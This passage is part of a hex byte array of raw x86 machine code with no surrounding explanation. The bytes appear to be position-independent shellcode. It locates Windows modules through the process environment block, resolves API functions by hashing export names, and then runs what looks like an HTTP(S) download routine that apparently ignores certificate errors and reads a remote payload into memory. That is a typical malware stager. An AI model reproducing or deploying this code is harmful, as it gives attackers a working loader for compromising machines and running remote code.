284 0xc4, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x1c, 0x8b, 0x55,
285 0xc4, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x8d, 0x8d, 0x44,
286 0xff, 0xff, 0xff, 0x8b, 0x55, 0xec, 0x01, 0xca, 0x88, 0x02, 0x83, 0x45,
287 0xec, 0x01, 0x8b, 0x55, 0xc4, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6,
288 0x00, 0x84, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xec, 0x3e, 0x76, 0xcf, 0x8d,
289 0x95, 0x44, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0xc6, 0x00,
290 0x00, 0x8d, 0x85, 0x44, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24, 0x0c, 0x8d,
291 0x45, 0x84, 0x89, 0x44, 0x24, 0x08, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24,
292 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xdb, 0xfc, 0xff, 0xff,
293 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x81,
294 0xec, 0x98, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00,
295 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x19, 0x8b, 0x55, 0x0c,
296 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x8d, 0x4d, 0x84, 0x8b,
297 0x55, 0xec, 0x01, 0xca, 0x88, 0x02, 0x83, 0x45, 0xec, 0x01, 0x8b, 0x55,
298 0x0c, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74,
299 0x06, 0x83, 0x7d, 0xec, 0x3f, 0x76, 0xd2, 0x8d, 0x55, 0x84, 0x8b, 0x45,
300 0xec, 0x01, 0xd0, 0xc6, 0x00, 0x00, 0x8b, 0x45, 0xec, 0x83, 0xe8, 0x04,
301 0x0f, 0xb6, 0x44, 0x05, 0x84, 0x3c, 0x2e, 0x74, 0x46, 0x8b, 0x45, 0xec,
302 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0xc6, 0x44, 0x05, 0x84, 0x2e, 0x8b,
303 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0xc6, 0x44, 0x05, 0x84,
304 0x64, 0x8b, 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0xc6, 0x44,
305 0x05, 0x84, 0x6c, 0x8b, 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec,
306 0xc6, 0x44, 0x05, 0x84, 0x6c, 0x8b, 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89,
307 0x55, 0xec, 0xc6, 0x44, 0x05, 0x84, 0x00, 0xc7, 0x45, 0xc8, 0x18, 0x00,
308 0x00, 0x00, 0x8b, 0x45, 0xc8, 0x64, 0x8b, 0x00, 0x89, 0x45, 0xc4, 0x8b,
309 0x45, 0xc4, 0x8b, 0x40, 0x30, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xe8, 0x8b,
310 0x40, 0x0c, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4, 0x8b, 0x40, 0x0c, 0x89,
311 0x45, 0xf4, 0xeb, 0x6e, 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x18, 0x89, 0x45,
312 0xe0, 0x8b, 0x45, 0xe0, 0x89, 0x45, 0xdc, 0x8b, 0x45, 0xdc, 0x8b, 0x40,
313 0x3c, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x01, 0xd0, 0x89, 0x45, 0xd8, 0x8b,
314 0x45, 0xd8, 0x8b, 0x40, 0x78, 0x89, 0x45, 0xd4, 0x83, 0x7d, 0xd4, 0x00,
315 0x74, 0x37, 0x8b, 0x55, 0xe0, 0x8b, 0x45, 0xd4, 0x01, 0xd0, 0x89, 0x45,
316 0xd0, 0x8b, 0x45, 0xd0, 0x8b, 0x50, 0x0c, 0x8b, 0x45, 0xe0, 0x01, 0xd0,
317 0x89, 0x45, 0xcc, 0x8b, 0x45, 0xcc, 0x89, 0x44, 0x24, 0x04, 0x8d, 0x45,
318 0x84, 0x89, 0x04, 0x24, 0xe8, 0x0f, 0x47, 0x00, 0x00, 0x85, 0xc0, 0x74,
319 0x09, 0x8b, 0x45, 0xe0, 0x89, 0x45, 0xf0, 0xeb, 0x01, 0x90, 0x8b, 0x45,
320 0xf4, 0x8b, 0x00, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x18,
321 0x85, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xf0, 0x00, 0x74, 0x82, 0x83, 0x7d,
322 0xf0, 0x00, 0x75, 0x14, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x30, 0x8d, 0x55,
323 0x84, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf0,
324 0x8b, 0x45, 0xf0, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x57, 0x56, 0x81, 0xec,
325 0x40, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x89, 0x85, 0xe0, 0xfd, 0xff,
326 0xff, 0x8b, 0x45, 0x14, 0x89, 0x85, 0xe4, 0xfd, 0xff, 0xff, 0x8b, 0x45,
327 0x18, 0x89, 0x85, 0xd8, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0x1c, 0x89, 0x85,
328 0xdc, 0xfd, 0xff, 0xff, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x8b,
329 0x45, 0x0c, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x3c, 0x89,
330 0xc2, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4,
331 0x83, 0xc0, 0x78, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x89,
332 0x45, 0xdc, 0x83, 0x7d, 0xdc, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00,
333 0x00, 0xe9, 0xb6, 0x02, 0x00, 0x00, 0x8b, 0x55, 0x0c, 0x8b, 0x45, 0xdc,
334 0x01, 0xd0, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xd8, 0x8b, 0x40, 0x18, 0x89,
335 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00,
336 0x00, 0xe9, 0x92, 0x02, 0x00, 0x00, 0x8b, 0x45, 0xd8, 0x8b, 0x50, 0x1c,
337 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xd4, 0x8b, 0x45, 0xd8, 0x8b,
338 0x50, 0x20, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xd0, 0x8b, 0x45,
339 0xd8, 0x8b, 0x50, 0x24, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xcc,
340 0x8b, 0x45, 0xd8, 0x8b, 0x50, 0x0c, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89,
341 0x45, 0xc8, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x21, 0x8b,
342 0x55, 0xc8, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x83, 0xc8,
343 0x20, 0x89, 0xc2, 0x8d, 0x8d, 0xb4, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xf4,
344 0x01, 0xc8, 0x88, 0x10, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x55, 0xc8, 0x8b,
345 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xd0, 0x8d,
346 0x95, 0xb4, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0xc6, 0x00,
347 0x00, 0x8b, 0x85, 0xd8, 0xfd, 0xff, 0xff, 0x8b, 0x95, 0xdc, 0xfd, 0xff,
348 0xff, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8d, 0x85, 0xb4,
349 0xfe, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0xd7, 0x4b, 0x00, 0x00, 0x89,
350 0x45, 0xc0, 0x89, 0x55, 0xc4, 0x8b, 0x45, 0xf0, 0x05, 0xff, 0xff, 0xff,
351 0x3f, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd0, 0x01,
352 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xbc, 0x8b,
353 0x85, 0xd8, 0xfd, 0xff, 0xff, 0x8b, 0x95, 0xdc, 0xfd, 0xff, 0xff, 0x89,
354 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x45, 0xbc, 0x89, 0x04,
355 0x24, 0xe8, 0x94, 0x4b, 0x00, 0x00, 0x89, 0xc1, 0x33, 0x4d, 0xc0, 0x89,
356 0xce, 0x89, 0xd0, 0x33, 0x45, 0xc4, 0x89, 0xc7, 0x89, 0xf0, 0x33, 0x85,
357 0xe0, 0xfd, 0xff, 0xff, 0x89, 0x85, 0xd0, 0xfd, 0xff, 0xff, 0x89, 0xf8,
358 0x33, 0x85, 0xe4, 0xfd, 0xff, 0xff, 0x89, 0x85, 0xd4, 0xfd, 0xff, 0xff,
359 0x8b, 0x95, 0xd0, 0xfd, 0xff, 0xff, 0x8b, 0x8d, 0xd4, 0xfd, 0xff, 0xff,
360 0x89, 0xc8, 0x09, 0xd0, 0x85, 0xc0, 0x0f, 0x85, 0x55, 0x01, 0x00, 0x00,
361 0x8b, 0x45, 0xf0, 0x05, 0xff, 0xff, 0xff, 0x7f, 0x8d, 0x14, 0x00, 0x8b,
362 0x45, 0xcc, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x8d, 0x14,
363 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd4, 0x01, 0xd0, 0x8b, 0x10,
364 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x3b,
365 0x45, 0xd8, 0x0f, 0x82, 0x18, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8b,
366 0x50, 0x04, 0x8b, 0x45, 0xd8, 0x01, 0xd0, 0x39, 0x45, 0xec, 0x0f, 0x83,
367 0x04, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xec, 0x89, 0x45, 0xb8, 0xc7, 0x45,
368 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x2b, 0x8b, 0x55, 0xb8, 0x8b, 0x45,
369 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x8d, 0x8d, 0x74, 0xfe, 0xff, 0xff,
370 0x8b, 0x55, 0xf4, 0x01, 0xca, 0x88, 0x02, 0x8b, 0x55, 0xb8, 0x8b, 0x45,
371 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x2e, 0x74, 0x1b, 0x83, 0x45,
372 0xf4, 0x01, 0x8b, 0x55, 0xb8, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6,
373 0x00, 0x84, 0xc0, 0x74, 0x09, 0x83, 0x7d, 0xf4, 0x3b, 0x76, 0xc0, 0xeb,
374 0x01, 0x90, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x01, 0xc6, 0x84, 0x05, 0x74,
375 0xfe, 0xff, 0xff, 0x64, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x02, 0xc6, 0x84,
376 0x05, 0x74, 0xfe, 0xff, 0xff, 0x6c, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x03,
377 0xc6, 0x84, 0x05, 0x74, 0xfe, 0xff, 0xff, 0x6c, 0x8b, 0x45, 0xf4, 0x83,
378 0xc0, 0x04, 0xc6, 0x84, 0x05, 0x74, 0xfe, 0xff, 0xff, 0x00, 0x8b, 0x45,
379 0xf4, 0x83, 0xc0, 0x01, 0x01, 0x45, 0xb8, 0xc7, 0x45, 0xf4, 0x00, 0x00,
380 0x00, 0x00, 0xeb, 0x1c, 0x8b, 0x55, 0xb8, 0x8b, 0x45, 0xf4, 0x01, 0xd0,
381 0x0f, 0xb6, 0x00, 0x8d, 0x8d, 0xf4, 0xfd, 0xff, 0xff, 0x8b, 0x55, 0xf4,
382 0x01, 0xca, 0x88, 0x02, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x55, 0xb8, 0x8b,
383 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x06, 0x83,
384 0x7d, 0xf4, 0x7e, 0x76, 0xcf, 0x8d, 0x95, 0xf4, 0xfd, 0xff, 0xff, 0x8b,
385 0x45, 0xf4, 0x01, 0xd0, 0xc6, 0x00, 0x00, 0x8d, 0x85, 0xf4, 0xfd, 0xff,
386 0xff, 0x89, 0x44, 0x24, 0x0c, 0x8d, 0x85, 0x74, 0xfe, 0xff, 0xff, 0x89,
387 0x44, 0x24, 0x08, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45,
388 0x08, 0x89, 0x04, 0x24, 0xe8, 0x5e, 0xf8, 0xff, 0xff, 0x89, 0x45, 0xec,
389 0x8b, 0x45, 0xec, 0xeb, 0x17, 0x83, 0x6d, 0xf0, 0x01, 0x83, 0x7d, 0xf0,
390 0x00, 0x74, 0x0a, 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x84, 0x18, 0xfe, 0xff,
391 0xff, 0x8b, 0x45, 0xec, 0x81, 0xc4, 0x40, 0x02, 0x00, 0x00, 0x5e, 0x5f,
392 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x58, 0x8b, 0x45, 0x0c, 0x89,
393 0x45, 0xd0, 0x8b, 0x45, 0x10, 0x89, 0x45, 0xd4, 0x8b, 0x45, 0x14, 0x89,
394 0x45, 0xc8, 0x8b, 0x45, 0x18, 0x89, 0x45, 0xcc, 0xc7, 0x45, 0xf0, 0x00,
395 0x00, 0x00, 0x00, 0xc7, 0x45, 0xe4, 0x18, 0x00, 0x00, 0x00, 0x8b, 0x45,
396 0xe4, 0x64, 0x8b, 0x00, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe0, 0x8b, 0x40,
397 0x30, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x8b, 0x40, 0x0c, 0x89, 0x45,
398 0xe8, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xf4, 0xeb, 0x3c,
399 0x8b, 0x45, 0xf4, 0x8b, 0x48, 0x18, 0x8b, 0x45, 0xc8, 0x8b, 0x55, 0xcc,
400 0x89, 0x44, 0x24, 0x10, 0x89, 0x54, 0x24, 0x14, 0x8b, 0x45, 0xd0, 0x8b,
401 0x55, 0xd4, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x0c, 0x89, 0x4c,
402 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x50, 0xfc, 0xff,
403 0xff, 0x89, 0x45, 0xf0, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x45, 0xf4,
404 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x18, 0x85, 0xc0, 0x74, 0x06, 0x83, 0x7d,
405 0xf0, 0x00, 0x74, 0xb4, 0x8b, 0x45, 0xf0, 0xc9, 0xc3, 0x55, 0x89, 0xe5,
406 0x57, 0x56, 0x53, 0x81, 0xec, 0x5c, 0x03, 0x00, 0x00, 0xc7, 0x45, 0xe4,
407 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0x90, 0x00, 0x00, 0x00, 0x00, 0xc7,
408 0x45, 0xe0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xd8, 0x00, 0x00, 0x00,
409 0x00, 0xc7, 0x45, 0xd4, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
410 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00, 0x89,
411 0x45, 0xd0, 0xc7, 0x45, 0xdc, 0x00, 0x03, 0x60, 0x04, 0xc7, 0x44, 0x24,
412 0x08, 0x3c, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00,
413 0x00, 0x8d, 0x85, 0x54, 0xff, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0xfd,
414 0x40, 0x00, 0x00, 0xc7, 0x85, 0x54, 0xff, 0xff, 0xff, 0x3c, 0x00, 0x00,
415 0x00, 0x8d, 0x85, 0x50, 0xfe, 0xff, 0xff, 0x89, 0x85, 0x64, 0xff, 0xff,
416 0xff, 0xc7, 0x85, 0x68, 0xff, 0xff, 0xff, 0x04, 0x01, 0x00, 0x00, 0x8d,
417 0x85, 0x4c, 0xfd, 0xff, 0xff, 0x89, 0x45, 0x80, 0xc7, 0x45, 0x84, 0x04,
418 0x01, 0x00, 0x00, 0x8d, 0x85, 0x0c, 0xfd, 0xff, 0xff, 0x89, 0x85, 0x70,
419 0xff, 0xff, 0xff, 0xc7, 0x85, 0x74, 0xff, 0xff, 0xff, 0x40, 0x00, 0x00,
420 0x00, 0x8d, 0x85, 0xcc, 0xfc, 0xff, 0xff, 0x89, 0x85, 0x78, 0xff, 0xff,
421 0xff, 0xc7, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x40, 0x00, 0x00, 0x00, 0x8b,
422 0x45, 0x08, 0x8b, 0x80, 0xa8, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x8d,
423 0x8a, 0xf8, 0x08, 0x00, 0x00, 0x8d, 0x95, 0x54, 0xff, 0xff, 0xff, 0x89,
424 0x54, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x10, 0xc7,
425 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x0c, 0x24, 0xff, 0xd0,
426 0x83, 0xec, 0x10, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00,
427 0xe9, 0x58, 0x06, 0x00, 0x00, 0x8b, 0x85, 0x60, 0xff, 0xff, 0xff, 0x83,
428 0xf8, 0x04, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x45, 0xd8, 0x83,
429 0x7d, 0xd8, 0x00, 0x74, 0x14, 0x81, 0x4d, 0xdc, 0x00, 0x00, 0x80, 0x00,
430 0x83, 0x7d, 0xd4, 0x00, 0x74, 0x07, 0x81, 0x4d, 0xdc, 0x00, 0x30, 0x00,
431 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xac, 0x00, 0x00, 0x00, 0xc7, 0x44,
432 0x24, 0x10, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00,
433 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44,
434 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00,
435 0x00, 0xff, 0xd0, 0x83, 0xec, 0x14, 0x89, 0x45, 0xcc, 0x83, 0x7d, 0xcc,
436 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xe4, 0x05, 0x00,
437 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x0f, 0xb7,
438 0x95, 0x6c, 0xff, 0xff, 0xff, 0x0f, 0xb7, 0xd2, 0xc7, 0x44, 0x24, 0x1c,
439 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x18, 0x00, 0x00, 0x00, 0x00,
440 0xc7, 0x44, 0x24, 0x14, 0x03, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10,
441 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00,
442 0x89, 0x54, 0x24, 0x08, 0x8d, 0x95, 0x50, 0xfe, 0xff, 0xff, 0x89, 0x54,
443 0x24, 0x04, 0x8b, 0x55, 0xcc, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
444 0x20, 0x89, 0x45, 0xc8, 0x83, 0x7d, 0xc8, 0x00, 0x0f, 0x84, 0xb6, 0x04,
445 0x00, 0x00, 0x8b, 0x45, 0x84, 0x85, 0xc0, 0x75, 0x0e, 0xc6, 0x85, 0x4c,
446 0xfd, 0xff, 0xff, 0x2f, 0xc6, 0x85, 0x4d, 0xfd, 0xff, 0xff, 0x00, 0x8b,
447 0x45, 0x08, 0x8b, 0x80, 0xc4, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c,
448 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xdc, 0x89, 0x54, 0x24, 0x18, 0xc7,
449 0x44, 0x24, 0x14, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00,
450 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8d,
451 0x95, 0x4c, 0xfd, 0xff, 0xff, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24,
452 0x04, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc8, 0x89, 0x14, 0x24, 0xff,
453 0xd0, 0x83, 0xec, 0x20, 0x89, 0x45, 0xc4, 0x83, 0x7d, 0xc4, 0x00, 0x0f,
454 0x84, 0x33, 0x04, 0x00, 0x00, 0x83, 0x7d, 0xd8, 0x00, 0x74, 0x45, 0x8b,
455 0x45, 0xdc, 0x25, 0x00, 0x10, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x39, 0xc7,
456 0x45, 0xc0, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x45, 0x9c, 0x80, 0x33, 0x00,
457 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xb4, 0x00, 0x00, 0x00, 0xc7, 0x44,
458 0x24, 0x0c, 0x04, 0x00, 0x00, 0x00, 0x8d, 0x55, 0x9c, 0x89, 0x54, 0x24,
459 0x08, 0xc7, 0x44, 0x24, 0x04, 0x1f, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc4,
460 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x8b, 0x85, 0x74, 0xff,
461 0xff, 0xff, 0x85, 0xc0, 0x74, 0x33, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xb4,
462 0x00, 0x00, 0x00, 0x8b, 0x8d, 0x74, 0xff, 0xff, 0xff, 0x8b, 0x95, 0x70,
463 0xff, 0xff, 0xff, 0x89, 0x4c, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x08, 0xc7,
464 0x44, 0x24, 0x04, 0x1c, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc4, 0x89, 0x14,
465 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89, 0x45, 0xe0, 0x8b, 0x85, 0x7c,
466 0xff, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x33, 0x8b, 0x45, 0x08, 0x8b, 0x80,
467 0xb4, 0x00, 0x00, 0x00, 0x8b, 0x8d, 0x7c, 0xff, 0xff, 0xff, 0x8b, 0x95,
468 0x78, 0xff, 0xff, 0xff, 0x89, 0x4c, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x08,
469 0xc7, 0x44, 0x24, 0x04, 0x1d, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc4, 0x89,
470 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89, 0x45, 0xe0, 0x8b, 0x45,
471 0x08, 0x8b, 0x80, 0xc8, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00,
472 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0xc7,
473 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00,
474 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
475 0xec, 0x14, 0x85, 0xc0, 0x0f, 0x84, 0x47, 0x02, 0x00, 0x00, 0xc7, 0x45,
476 0x94, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x45, 0x90, 0x00, 0x00, 0x00, 0x00,
477 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xcc, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
478 0x10, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x55, 0x94, 0x89, 0x54, 0x24, 0x0c,
479 0x8d, 0x55, 0x90, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x13,
480 0x00, 0x00, 0x20, 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
481 0xec, 0x14, 0x85, 0xc0, 0x0f, 0x84, 0xff, 0x01, 0x00, 0x00, 0x8b, 0x45,
482 0x90, 0x3d, 0xc8, 0x00, 0x00, 0x00, 0x0f, 0x85, 0xf1, 0x01, 0x00, 0x00,
483 0xc7, 0x45, 0x94, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa0, 0x00, 0x00,
484 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xcc, 0x00, 0x00, 0x00, 0xc7,
485 0x44, 0x24, 0x10, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x55, 0x94, 0x89, 0x54,
486 0x24, 0x0c, 0x8d, 0x55, 0xa0, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24,
487 0x04, 0x05, 0x00, 0x00, 0x20, 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff,
488 0xd0, 0x83, 0xec, 0x14, 0x89, 0x45, 0xbc, 0x83, 0x7d, 0xbc, 0x00, 0x0f,
489 0x85, 0x2d, 0x01, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x7c, 0xff,
490 0xd0, 0x3d, 0x76, 0x2f, 0x00, 0x00, 0x0f, 0x85, 0x91, 0x01, 0x00, 0x00,
491 0xc7, 0x45, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80,
492 0xc0, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00,
493 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x55, 0xa4, 0x89,
494 0x54, 0x24, 0x04, 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
495 0xec, 0x10, 0x89, 0x45, 0xbc, 0x83, 0x7d, 0xbc, 0x00, 0x0f, 0x84, 0x52,
496 0x01, 0x00, 0x00, 0x8b, 0x45, 0xa4, 0x85, 0xc0, 0x0f, 0x84, 0x47, 0x01,
497 0x00, 0x00, 0x83, 0x7d, 0xe4, 0x00, 0x75, 0x3f, 0x8b, 0x45, 0x08, 0x8b,
498 0x58, 0x6c, 0x8b, 0x45, 0xa4, 0x89, 0x85, 0xc4, 0xfc, 0xff, 0xff, 0x8b,
499 0x45, 0x08, 0x8b, 0x40, 0x74, 0xff, 0xd0, 0x8b, 0x8d, 0xc4, 0xfc, 0xff,
500 0xff, 0x89, 0x4c, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x01, 0x00, 0x00,
501 0x00, 0x89, 0x04, 0x24, 0xff, 0xd3, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xe4,
502 0x83, 0x7d, 0xe4, 0x00, 0x75, 0x4f, 0xe9, 0x02, 0x01, 0x00, 0x00, 0x8b,
503 0x45, 0x08, 0x8b, 0x58, 0x70, 0x8b, 0x55, 0xa0, 0x8b, 0x45, 0xa4, 0x01,
504 0xd0, 0x89, 0x85, 0xc4, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x40,
505 0x74, 0xff, 0xd0, 0x8b, 0x8d, 0xc4, 0xfc, 0xff, 0xff, 0x89, 0x4c, 0x24,
506 0x0c, 0x8b, 0x55, 0xe4, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04,
507 0x01, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0xff, 0xd3, 0x83, 0xec, 0x10,
508 0x89, 0x45, 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x0f, 0x84, 0xb7, 0x00, 0x00,
509 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x8b, 0x55,
